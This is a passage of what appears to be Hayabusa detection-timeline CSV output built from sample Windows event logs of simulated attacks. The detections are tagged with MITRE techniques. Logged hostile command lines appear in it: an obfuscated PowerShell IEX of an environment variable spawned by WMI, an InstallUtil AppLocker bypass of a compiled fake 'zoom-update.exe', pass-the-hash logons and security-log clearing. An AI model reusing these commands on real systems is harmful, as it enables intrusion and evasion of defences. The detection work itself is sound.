,46,32,46,32,46,32,58,32,89,101,115,13,10,32,32,32,76,105,110,107,45,108,111,99,97,108,32,73,80,118,54,32,65,100,100,114,101,115,115,32,46,32,46,32,46,32,46,32,46,32,58,32,102,101,56,48,58,58,99,48,98,100,58,54,57,54,99,58,51,57,54,48,58,97,49,98,49,37,49,50,40,80,114,101,102,101,114,114,101,100,41,32,13,10,32,32,32,73,80,118,52,32,65,100,100,114,101,115,115,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,58,32,49,48,46,50,51,46,52,50,46,51,56,40,80,114,101,102,101,114,114,101,100,41,32,13,10,32,32,32,83,117,98,110,101,116,32,77,97,115,107,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,58,32,50,53,53,46,50,53,53,46,50,53,53,46,48,13,10,32,32,32,68,101,102,97,117,108,116,32,71,97,116,101,119,97,121,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,58,32,49,48,46,50,51,46,52,50,46,49,13,10,32,32,32,68,72,67,80,118,54,32,73,65,73,68,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,58,32,51,48,50,48,49,48,52,53,52,13,10,32,32,32,68,72,67,80,118,54,32,67,108,105,101,110,116,32,68,85,73,68,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,58,32,48,48,45,48,49,45,48,48,45,48,49,45,50,54,45,52,54,45,50,56,45,65,68,45,48,48,45,53,48,45,53,54,45,57,55,45,50,66,45,55,55,13,10,32,32,32,68,78,83,32,83,101,114,118,101,114,115,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,58,32,49,48,46,50,51,46,52,50,46,49,48,13,10,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,49,48,46,50,51,46,52,50,46,49,49,13,10,32,32,32,78,101,116,66,73,79,83,32,111,118,101,114,32,84,99,112,105,112,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,58,32,69,110,97,98,108,101,100,13,10,13,10,84,117,110,110,101,108,32,97,100,97,112,116,101,114,32,105,115,97,116,97,112,46,123,68,54,56,57,48,67,54,52,45,54,67,56,55,45,52,48,54,65,45,65,69,66,56,45,69,51,51,70,53,52,69,53,66,67,56,50,125,58,13,10,13,10,32,32,32,77,101,100,105,97,32,83,116,97,116,101,32,46,32,46
,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,58,32,77,101,100,105,97,32,100,105,115,99,111,110,110,101,99,116,101,100,13,10,32,32,32,67,111,110,110,101,99,116,105,111,110,45,115,112,101,99,105,102,105,99,32,68,78,83,32,83,117,102,102,105,120,32,32,46,32,58,32,13,10,32,32,32,68,101,115,99,114,105,112,116,105,111,110,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,58,32,77,105,99,114,111,115,111,102,116,32,73,83,65,84,65,80,32,65,100,97,112,116,101,114,13,10,32,32,32,80,104,121,115,105,99,97,108,32,65,100,100,114,101,115,115,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,58,32,48,48,45,48,48,45,48,48,45,48,48,45,48,48,45,48,48,45,48,48,45,69,48,13,10,32,32,32,68,72,67,80,32,69,110,97,98,108,101,100,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,58,32,78,111,13,10,32,32,32,65,117,116,111,99,111,110,102,105,103,117,114,97,116,105,111,110,32,69,110,97,98,108,101,100,32,46,32,46,32,46,32,46,32,58,32,89,101,115 | Process: C:\Windows\system32\wbem\wmiprvse.exe | PID: 1508 | PGUID: A57649D1-1303-6179-D9C8-010000000000",rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID13-WMIimplant registry crash control.evtx 2021-11-08 19:26:55.139 +09:00,fs03vuln.offsec.lan,13,medium,,Registry Key Value Set_Sysmon Alert,"technique_id=T1047,technique_name=Windows Management Instrumentation | SetValue: HKLM\System\CurrentControlSet\Control\CrashControl\MiniDumpDir: %%SystemRoot%%\Minidump | Process: C:\Windows\system32\wbem\wmiprvse.exe | PID: 1508 | PGUID: A57649D1-1303-6179-D9C8-010000000000",rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID13-WMIimplant registry crash control.evtx 2021-11-08 19:26:59.790 +09:00,fs03vuln.offsec.lan,13,medium,,Registry Key Value Set_Sysmon 
Alert,"technique_id=T1047,technique_name=Windows Management Instrumentation | SetValue: HKLM\System\CurrentControlSet\Control\CrashControl\LogEvent: DWORD (0x00000001) | Process: C:\Windows\system32\wbem\wmiprvse.exe | PID: 1508 | PGUID: A57649D1-1303-6179-D9C8-010000000000",rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID13-WMIimplant registry crash control.evtx 2021-11-08 19:26:59.790 +09:00,fs03vuln.offsec.lan,13,medium,,Registry Key Value Set_Sysmon Alert,"technique_id=T1047,technique_name=Windows Management Instrumentation | SetValue: HKLM\System\CurrentControlSet\Control\CrashControl\SendAlert: DWORD (0x00000000) | Process: C:\Windows\system32\wbem\wmiprvse.exe | PID: 1508 | PGUID: A57649D1-1303-6179-D9C8-010000000000",rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID13-WMIimplant registry crash control.evtx 2021-11-08 19:26:59.790 +09:00,fs03vuln.offsec.lan,13,medium,,Registry Key Value Set_Sysmon Alert,"technique_id=T1047,technique_name=Windows Management Instrumentation | SetValue: HKLM\System\CurrentControlSet\Control\CrashControl\CrashDumpEnabled: DWORD (0x00000007) | Process: C:\Windows\system32\wbem\wmiprvse.exe | PID: 1508 | PGUID: A57649D1-1303-6179-D9C8-010000000000",rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID13-WMIimplant registry crash control.evtx 2021-11-08 19:26:59.790 +09:00,fs03vuln.offsec.lan,13,medium,,Registry Key Value Set_Sysmon Alert,"technique_id=T1047,technique_name=Windows Management Instrumentation | SetValue: HKLM\System\CurrentControlSet\Control\CrashControl\Overwrite: DWORD (0x00000001) | Process: C:\Windows\system32\wbem\wmiprvse.exe | PID: 1508 | PGUID: 
A57649D1-1303-6179-D9C8-010000000000",rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID13-WMIimplant registry crash control.evtx 2021-11-08 19:26:59.790 +09:00,fs03vuln.offsec.lan,13,medium,,Registry Key Value Set_Sysmon Alert,"technique_id=T1047,technique_name=Windows Management Instrumentation | SetValue: HKLM\System\CurrentControlSet\Control\CrashControl\KernelDumpOnly: DWORD (0x00000000) | Process: C:\Windows\system32\wbem\wmiprvse.exe | PID: 1508 | PGUID: A57649D1-1303-6179-D9C8-010000000000",rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID13-WMIimplant registry crash control.evtx 2021-11-08 19:26:59.790 +09:00,fs03vuln.offsec.lan,13,medium,,Registry Key Value Set_Sysmon Alert,"technique_id=T1047,technique_name=Windows Management Instrumentation | SetValue: HKLM\System\CurrentControlSet\Control\CrashControl\AutoReboot: DWORD (0x00000001) | Process: C:\Windows\system32\wbem\wmiprvse.exe | PID: 1508 | PGUID: A57649D1-1303-6179-D9C8-010000000000",rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID13-WMIimplant registry crash control.evtx 2021-11-08 19:26:59.790 +09:00,fs03vuln.offsec.lan,13,medium,,Registry Key Value Set_Sysmon Alert,"technique_id=T1047,technique_name=Windows Management Instrumentation | SetValue: HKLM\System\CurrentControlSet\Control\CrashControl\DumpFile: %%SystemRoot%%\MEMORY.DMP | Process: C:\Windows\system32\wbem\wmiprvse.exe | PID: 1508 | PGUID: A57649D1-1303-6179-D9C8-010000000000",rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID13-WMIimplant registry crash control.evtx 2021-11-08 
19:26:59.790 +09:00,fs03vuln.offsec.lan,13,medium,,Registry Key Value Set_Sysmon Alert,"technique_id=T1047,technique_name=Windows Management Instrumentation | SetValue: HKLM\System\CurrentControlSet\Control\CrashControl\MiniDumpDir: %%SystemRoot%%\Minidump | Process: C:\Windows\system32\wbem\wmiprvse.exe | PID: 1508 | PGUID: A57649D1-1303-6179-D9C8-010000000000",rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID13-WMIimplant registry crash control.evtx 2021-11-08 19:26:59.790 +09:00,fs03vuln.offsec.lan,13,medium,,CrashControl CrashDump Disabled,,rules/sigma/registry_event/registy_event_crashdump_disabled.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID13-WMIimplant registry crash control.evtx 2021-11-08 19:26:59.790 +09:00,fs03vuln.offsec.lan,13,medium,,CrashControl CrashDump Disabled,,rules/sigma/registry_event/registy_event_crashdump_disabled.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID13-WMIimplant registry crash control.evtx 2021-11-09 00:01:27.604 +09:00,fs03vuln.offsec.lan,1,high,,Process Created_Sysmon Alert,"technique_id=T1086,technique_name=PowerShell | Cmd: powershell $env:I4Pzl|.(Get-C`ommand ('{1}e{0}'-f'x','i')) | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | User: OFFSEC\admmig | Parent Cmd: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding | LID: 0x35d1aad | PID: 1860 | PGUID: A57649D1-3BC7-6189-091B-5D0300000000 | Hash: SHA1=9F1E24917EF96BBB339F4E2A226ACAFD1009F47B,MD5=C031E215B8B08C752BF362F6D4C5D3AD,SHA256=840E1F9DC5A29BEBF01626822D7390251E9CF05BB3560BA7B68BDB8A41CF08E3,IMPHASH=099B747A4A31983374E54912D4BB7C44",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID1-WMI spwaning 
PowerShell process - WMImplant.evtx 2021-11-09 00:01:27.604 +09:00,fs03vuln.offsec.lan,1,high,Exec,Suspicious PowerShell Parent Process,,rules/sigma/process_creation/proc_creation_win_susp_powershell_parent_process.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID1-WMI spwaning PowerShell process - WMImplant.evtx 2021-11-09 00:01:27.604 +09:00,fs03vuln.offsec.lan,1,high,Exec,WMI Spawning Windows PowerShell,,rules/sigma/process_creation/proc_creation_win_wmi_spwns_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID1-WMI spwaning PowerShell process - WMImplant.evtx 2021-11-09 00:01:27.604 +09:00,fs03vuln.offsec.lan,1,high,Exec,Wmiprvse Spawning Process,,rules/sigma/process_creation/proc_creation_win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID1-WMI spwaning PowerShell process - WMImplant.evtx 2021-11-09 00:01:27.604 +09:00,fs03vuln.offsec.lan,1,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID1-WMI spwaning PowerShell process - WMImplant.evtx 2021-11-13 23:08:45.929 +09:00,FS03.offsec.lan,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: admmig | Target User: hack1 | IP Address: - | Process: | Target Server: cifs/fs03vuln.offsec.lan,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688-4648 Lateral movement with net use.evtx 2021-11-13 23:30:53.638 +09:00,FS03.offsec.lan,1102,high,Evas,Security Log Cleared,User: 
admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1134-Access Token Manipulation/ID4688,4648,4624-Runas execution with different user.evtx" 2021-11-13 23:30:58.226 +09:00,FS03.offsec.lan,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: admmig | Target User: hack1 | IP Address: ::1 | Process: C:\Windows\System32\svchost.exe | Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1134-Access Token Manipulation/ID4688,4648,4624-Runas execution with different user.evtx" 2021-11-13 23:30:58.226 +09:00,FS03.offsec.lan,4672,info,,Admin Logon,User: hack1 | LID: 0xa6f5fa4,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1134-Access Token Manipulation/ID4688,4648,4624-Runas execution with different user.evtx" 2021-11-13 23:30:58.226 +09:00,FS03.offsec.lan,4624,info,,Logon Type 2 - Interactive,User: hack1 | Computer: FS03 | IP Addr: ::1 | LID: 0xa6f5fa4 | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1134-Access Token Manipulation/ID4688,4648,4624-Runas execution with different user.evtx" 2021-11-13 23:30:58.226 +09:00,FS03.offsec.lan,4624,info,,Logon Type 2 - Interactive,User: hack1 | Computer: FS03 | IP Addr: ::1 | LID: 0xa6f5fc2 | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1134-Access Token Manipulation/ID4688,4648,4624-Runas execution with different user.evtx" 2021-11-18 16:40:29.566 
+09:00,PC-01.cybercat.local,1,high,,Process Created_Sysmon Alert,"technique_id=T1059,technique_name=Command-Line Interface | Cmd: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /unsafe /nologo /target:exe /out:zoom-update.exe C:\Users\pc1-user\Desktop\zoom-update.cs | Process: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | User: CYBERCAT\pc1-user | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x678fe | PID: 2604 | PGUID: 510C1E8A-036D-6196-6801-000000000F00 | Hash: SHA1=22A72E39D307BC628093B043EF058DB1310BBF4B,MD5=28D96A80131C05E552066C798C0D8ACB,SHA256=C5270C0D8718C66382240DB538F9BACDED8DB55424768C2D942A6210B96B2720,IMPHASH=EE1E569AD02AA1F7AECA80AC0601D80D",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/YamatoSecurity/T1027.004_Obfuscated Files or Information Compile After Delivery/sysmon.evtx 2021-11-18 16:40:29.774 +09:00,PC-01.cybercat.local,11,info,,File Created,Path: C:\Users\pc1-user\Desktop\CSCFD9BAF75EA53488BBE2F1273837CC796.TMP | Process: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | PID: 2604 | PGUID: 510C1E8A-036D-6196-6801-000000000F00,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/YamatoSecurity/T1027.004_Obfuscated Files or Information Compile After Delivery/sysmon.evtx 2021-11-18 16:40:29.795 +09:00,PC-01.cybercat.local,11,info,,File Created,Path: C:\Users\pc1-user\Desktop\zoom-update.exe | Process: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | PID: 2604 | PGUID: 510C1E8A-036D-6196-6801-000000000F00,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/YamatoSecurity/T1027.004_Obfuscated Files or Information Compile After Delivery/sysmon.evtx 2021-11-18 16:40:29.795 +09:00,PC-01.cybercat.local,11,medium,,File Created_Sysmon Alert,"technique_id=T1047,technique_name=File System Permissions Weakness | Path: C:\Windows\Prefetch\CVTRES.EXE-BBD3ED93.pf | Process: C:\Windows\System32\svchost.exe | PID: 1128 | PGUID: 
510C1E8A-EF1A-6195-1A00-000000000F00",rules/hayabusa/sysmon/alerts/11_FileCreated_SysmonAlert.yml,../hayabusa-sample-evtx/YamatoSecurity/T1027.004_Obfuscated Files or Information Compile After Delivery/sysmon.evtx 2021-11-18 16:40:29.809 +09:00,PC-01.cybercat.local,11,medium,,File Created_Sysmon Alert,"technique_id=T1047,technique_name=File System Permissions Weakness | Path: C:\Windows\Prefetch\CSC.EXE-B6D5E435.pf | Process: C:\Windows\System32\svchost.exe | PID: 1128 | PGUID: 510C1E8A-EF1A-6195-1A00-000000000F00",rules/hayabusa/sysmon/alerts/11_FileCreated_SysmonAlert.yml,../hayabusa-sample-evtx/YamatoSecurity/T1027.004_Obfuscated Files or Information Compile After Delivery/sysmon.evtx 2021-11-18 16:40:30.866 +09:00,PC-01.cybercat.local,13,medium,,Registry Key Value Set_Sysmon Alert,"technique_id=T1543,technique_name=Service Creation | SetValue: HKLM\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-21-1448793622-2040000875-2550846437-1103\\Device\HarddiskVolume3\Windows\System32\dllhost.exe: Binary Data | Process: C:\Windows\system32\svchost.exe | PID: 748 | PGUID: 510C1E8A-EF18-6195-0F00-000000000F00",rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/YamatoSecurity/T1027.004_Obfuscated Files or Information Compile After Delivery/sysmon.evtx 2021-11-18 16:40:35.935 +09:00,PC-01.cybercat.local,13,medium,,Registry Key Value Set_Sysmon Alert,"technique_id=T1543,technique_name=Service Creation | SetValue: HKLM\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-21-1448793622-2040000875-2550846437-1103\\Device\HarddiskVolume3\Windows\System32\dllhost.exe: Binary Data | Process: C:\Windows\system32\DllHost.exe | PID: 2348 | PGUID: 510C1E8A-036E-6196-6A01-000000000F00",rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/YamatoSecurity/T1027.004_Obfuscated Files or Information Compile After Delivery/sysmon.evtx 2021-11-18 16:40:46.157 
+09:00,PC-01.cybercat.local,11,info,,File Created,Path: C:\Users\pc1-user\Desktop\sysmon.evtx | Process: C:\Windows\system32\mmc.exe | PID: 3116 | PGUID: 510C1E8A-FFD9-6195-4401-000000000F00,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/YamatoSecurity/T1027.004_Obfuscated Files or Information Compile After Delivery/sysmon.evtx 2021-11-18 16:40:46.404 +09:00,PC-01.cybercat.local,23,info,,Deleted File Archived,C:\Users\pc1-user\AppData\Roaming\Microsoft\Windows\Recent\sysmon.evtx.lnk | Process: C:\Windows\Explorer.EXE | User: CYBERCAT\pc1-user | PID: 3384 | PGUID: 510C1E8A-EF2F-6195-6200-000000000F00,rules/hayabusa/sysmon/events/23_DeletedFileArchived.yml,../hayabusa-sample-evtx/YamatoSecurity/T1027.004_Obfuscated Files or Information Compile After Delivery/sysmon.evtx 2021-11-18 16:42:34.415 +09:00,PC-01.cybercat.local,12,medium,,Registry Key Create/Delete_Sysmon Alert,"technique_id=T1543,technique_name=Service Creation | CreateKey: HKLM\System\CurrentControlSet\Services\ClipSVC\Parameters | Process: C:\Windows\System32\svchost.exe | PID: 5672 | PGUID: 510C1E8A-0348-6196-6701-000000000F00",rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/YamatoSecurity/T1218.004_Signed Binary Proxy Execution InstallUtil/sysmon.evtx 2021-11-18 16:42:34.416 +09:00,PC-01.cybercat.local,12,medium,,Registry Key Create/Delete_Sysmon Alert,"technique_id=T1543,technique_name=Service Creation | CreateKey: HKLM\System\CurrentControlSet\Services\ClipSVC\Parameters | Process: C:\Windows\System32\svchost.exe | PID: 5672 | PGUID: 510C1E8A-0348-6196-6701-000000000F00",rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/YamatoSecurity/T1218.004_Signed Binary Proxy Execution InstallUtil/sysmon.evtx 2021-11-18 16:42:54.822 +09:00,PC-01.cybercat.local,1,high,,Process Created_Sysmon Alert,"technique_id=T1218.004,technique_name=InstallUtil | Cmd: 
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U C:\Users\pc1-user\Desktop\zoom-update.exe | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | User: CYBERCAT\pc1-user | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x678fe | PID: 816 | PGUID: 510C1E8A-03FE-6196-7101-000000000F00 | Hash: SHA1=25F66231385528D9F0E14546E2132AC486CB6955,MD5=964D5013C1EC42371AD135E02221A704,SHA256=19C86A9315EECCBB480BA6C48711EE24EA24EE97E27C1E1EEAC8B63D01A71D9F,IMPHASH=F34D5F2D4577ED6D9CEEC516C1F5A744",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/YamatoSecurity/T1218.004_Signed Binary Proxy Execution InstallUtil/sysmon.evtx 2021-11-18 16:42:54.822 +09:00,PC-01.cybercat.local,1,low,Evas,Possible Applocker Bypass,,rules/sigma/process_creation/proc_creation_win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/YamatoSecurity/T1218.004_Signed Binary Proxy Execution InstallUtil/sysmon.evtx 2021-11-18 16:42:54.822 +09:00,PC-01.cybercat.local,1,medium,Evas,Suspicious Execution of InstallUtil Without Log,,rules/sigma/process_creation/proc_creation_win_susp_instalutil.yml,../hayabusa-sample-evtx/YamatoSecurity/T1218.004_Signed Binary Proxy Execution InstallUtil/sysmon.evtx 2021-11-18 16:43:04.979 +09:00,PC-01.cybercat.local,11,medium,,File Created_Sysmon Alert,"technique_id=T1047,technique_name=File System Permissions Weakness | Path: C:\Windows\Prefetch\INSTALLUTIL.EXE-9953E407.pf | Process: C:\Windows\System32\svchost.exe | PID: 1128 | PGUID: 510C1E8A-EF1A-6195-1A00-000000000F00",rules/hayabusa/sysmon/alerts/11_FileCreated_SysmonAlert.yml,../hayabusa-sample-evtx/YamatoSecurity/T1218.004_Signed Binary Proxy Execution InstallUtil/sysmon.evtx 2021-11-18 16:43:22.487 +09:00,PC-01.cybercat.local,11,info,,File Created,Path: C:\Users\pc1-user\Desktop\sysmon.evtx | Process: C:\Windows\system32\mmc.exe | PID: 3116 | PGUID: 
510C1E8A-FFD9-6195-4401-000000000F00,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/YamatoSecurity/T1218.004_Signed Binary Proxy Execution InstallUtil/sysmon.evtx 2021-11-18 16:43:22.705 +09:00,PC-01.cybercat.local,23,info,,Deleted File Archived,C:\Users\pc1-user\AppData\Roaming\Microsoft\Windows\Recent\sysmon.evtx.lnk | Process: C:\Windows\Explorer.EXE | User: CYBERCAT\pc1-user | PID: 3384 | PGUID: 510C1E8A-EF2F-6195-6200-000000000F00,rules/hayabusa/sysmon/events/23_DeletedFileArchived.yml,../hayabusa-sample-evtx/YamatoSecurity/T1218.004_Signed Binary Proxy Execution InstallUtil/sysmon.evtx 2021-11-23 18:26:30.059 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: ANONYMOUS LOGON | Computer: | IP Addr: 10.23.123.11 | LID: 0x8157add,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/4624,4674,4688- CrackMap Exec SMB mimikatz.evtx" 2021-11-23 18:26:30.121 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0x8157afc,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/4624,4674,4688- CrackMap Exec SMB mimikatz.evtx" 2021-11-23 18:26:30.121 +09:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/4624,4674,4688- CrackMap Exec SMB mimikatz.evtx" 2021-11-23 18:26:30.137 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0x8157b29,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense 
Evasion/T1027-Obfuscated Files or Information/4624,4674,4688- CrackMap Exec SMB mimikatz.evtx" 2021-11-23 18:26:30.137 +09:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/4624,4674,4688- CrackMap Exec SMB mimikatz.evtx" 2021-11-23 18:26:30.168 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0x8157b4e,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/4624,4674,4688- CrackMap Exec SMB mimikatz.evtx" 2021-11-23 18:26:30.246 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0x8157b70,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/4624,4674,4688- CrackMap Exec SMB mimikatz.evtx" 2021-11-23 18:26:30.309 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0x8157b8f,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/4624,4674,4688- CrackMap Exec SMB mimikatz.evtx" 2021-11-23 18:26:30.371 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0x8157bac,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/4624,4674,4688- CrackMap Exec SMB mimikatz.evtx" 2021-11-23 18:26:30.635 +09:00,fs03vuln.offsec.lan,4688,low,,Suspicious 
